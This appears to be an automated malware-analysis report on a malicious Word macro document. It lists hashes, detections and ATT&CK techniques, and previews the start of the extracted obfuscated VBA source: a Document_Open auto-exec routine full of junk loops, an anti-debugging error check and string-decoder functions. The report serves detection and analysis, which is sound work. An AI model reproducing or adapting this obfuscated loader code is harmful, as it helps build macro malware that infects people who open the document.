Office (OOXML) malware analysis — malicious · 1dff628441828433

MALICIOUS

Office (OOXML)

133.3 KB Created: 2016-05-25 20:34:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2016-07-20

MD5: d3ee5d6363db1f1514256d03cf14ad77 SHA-1: 7440f3b5ee4842a1e8d83220369358d53a498dbe SHA-256: 1dff628441828433a8da906204872937936fe31ce5ec5b5f0635dd5ea2f8e893

322 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing a malicious VBA macro, specifically an obfuscated auto-exec loader with a Document_Open macro. This macro uses CreateObject to likely download and execute a second-stage payload, as indicated by ClamAV detections like Doc.Downloader.OXmlEvader-5. The obfuscated nature and the presence of an auto-exec macro strongly suggest a downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.OXmlEvader-5 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.OXmlEvader-5
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	92332 bytes
SHA-256: `07609d4fb89c16b24308214563135ecc095cb8ffad34cbfd2a9bdba6c4ce3f3c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Dim WJE4CWJq(2754) As Integer Dim VYGpI(87219000 / 9691) As Long, DcJx(19730 - 9731) As Long Private Sub Document_Open() Dim CZ As Integer CZ = 53 If CZ > 32 Then CZ = 9 Do CZ = CZ + 1 Loop While CZ <= 198 End If On Error Resume Next Dim AAUOia As Integer AAUOia = 70 If AAUOia > 32 Then AAUOia = 9 While AAUOia <= 122 AAUOia = AAUOia + 1 Wend End If Dim Tu0Z As Long, W8L As Long, NRoG As Long Dim UWJTH As Integer UWJTH = 61 If UWJTH > 32 Then UWJTH = 9 For UWJTH = 1 To 45 UWJTH = UWJTH + 1 Next End If Tu0Z = 90296: W8L = 0: NRoG = 0 Dim HsuQzAS As Integer HsuQzAS = 2 If HsuQzAS > 28 Then HsuQzAS = 9 Do HsuQzAS = HsuQzAS + 1 Loop While HsuQzAS <= 238 End If For W8L = 1 To Tu0Z NRoG = NRoG + 1 Next W8L Dim YGo3o As Integer YGo3o = 64 If YGo3o > 37 Then YGo3o = 3 While YGo3o <= 256 YGo3o = YGo3o + 1 Wend End If If NRoG = Tu0Z Then Dim B1 As Integer B1 = 41 If B1 > 25 Then B1 = 7 Do B1 = B1 + 1 Loop While B1 <= 85 End If Dim Xac As Integer, B0L6gvwZp As String For Xac = 2 To 411 B0L6gvwZp = B0L6gvwZp + Xac Next Dim WamS6pYyNp As Integer WamS6pYyNp = 90 If WamS6pYyNp > 20 Then WamS6pYyNp = 9 Do WamS6pYyNp = WamS6pYyNp + 1 Loop While WamS6pYyNp <= 135 End If If Uu(29) = True Then PNZ9 Else Dim MbeIa12Pk As Integer MbeIa12Pk = 60 If MbeIa12Pk > 24 Then MbeIa12Pk = 9 For MbeIa12Pk = 1 To 199 MbeIa12Pk = MbeIa12Pk + 1 Next End If UGp Dim GflGsQS As Integer GflGsQS = 43 If GflGsQS > 34 Then GflGsQS = 4 While GflGsQS <= 151 GflGsQS = GflGsQS + 1 Wend End If End If Dim LDDfbnQRLe As Integer LDDfbnQRLe = 16 If LDDfbnQRLe > 31 Then LDDfbnQRLe = 4 While LDDfbnQRLe <= 163 LDDfbnQRLe = LDDfbnQRLe + 1 Wend End If End Sub Private Function BCJ(NhaKXe() As Byte) As String Dim HnTb As Integer HnTb = 36 If HnTb > 33 Then HnTb = 5 Do While HnTb <= 265 HnTb = HnTb + 1 Loop End If Dim XaXhf As Long Dim EtD As Integer EtD = 73 If EtD > 37 Then EtD = 3 Do While EtD <= 1 EtD = EtD + 1 Loop End If For XaXhf = 0 To VYw(NhaKXe) Dim Gpy As Integer Gpy = 96 If Gpy > 22 Then Gpy = 7 For Gpy = 1 To 128 Gpy = Gpy + 1 Next End If BCJ = BCJ & B2iuZ4ahLd(NhaKXe(XaXhf)) Dim PBa7CCx7EF As Integer PBa7CCx7EF = 17 If PBa7CCx7EF > 25 Then PBa7CCx7EF = 5 Do While PBa7CCx7EF <= 185 PBa7CCx7EF = PBa7CCx7EF + 1 Loop End If Next XaXhf Dim HD5W5zuti As Integer HD5W5zuti = 28 If HD5W5zuti > 23 Then HD5W5zuti = 7 Do HD5W5zuti = HD5W5zuti + 1 Loop While HD5W5zuti <= 189 End If End Function Private Sub UGp() Dim C8Kq9 As Integer C8Kq9 = 25 If C8Kq9 > 35 Then C8Kq9 = 3 Do While C8Kq9 <= 123 C8Kq9 = C8Kq9 + 1 Loop End If Dim W0br As Integer W0br = 17 If W0br > 30 Then W0br = 5 For W0br = 1 To 30 W0br = W0br + 1 Next End If End Sub Private Function Uu(OL As Integer) As Boolean Dim CwMk As Integer CwMk = 37 If CwMk > 23 Then CwMk = 7 While CwMk <= 29 CwMk = CwMk + 1 Wend End If On Error Resume Next Dim T4wwGlZCH As Integer T4wwGlZCH = 50 If T4wwGlZCH > 24 Then T4wwGlZCH = 7 Do T4wwGlZCH = T4wwGlZCH + 1 Loop While T4wwGlZCH <= 295 End If Debug.Assert 99175 / 0 Dim XwSjcLhso2 As Integer XwSjcLhso2 = 83 If XwSjcLhso2 > 25 Then XwSjcLhso2 = 3 Do While XwSjcLhso2 <= 165 XwSjcLhso2 = XwSjcLhso2 + 1 Loop End If If Err.Description <> "" Then Uu = True Dim D85 As Integer D85 = 90 If D85 > 26 Then D85 = 8 For D85 = 1 To 237 D85 = D85 + 1 Next End If End Function Private Function VYw(ByVal UtFDbGj4 As Variant) As Long Dim J99ss3 As Integer J99ss3 = 1 If J99ss3 > 35 Then J99ss3 = 8 While J99ss3 <= 153 J99ss3 = J99ss3 + 1 Wend End If On Error GoTo OnUX Dim LDI0ONwy As Integer LDI0ONwy = 96 If LDI0ONwy > 22 Then LDI0ONwy = 7 For LDI0ONwy = 1 To 128 LDI0ONwy = LDI0ONwy + 1 Next End ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	170496 bytes
SHA-256: `94735137ef08ed83a876f621aee976d06d1bb8c88eaa0c3f247659782aa260ab`
Detection ClamAV: Doc.Downloader.OXmlEvader-5 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.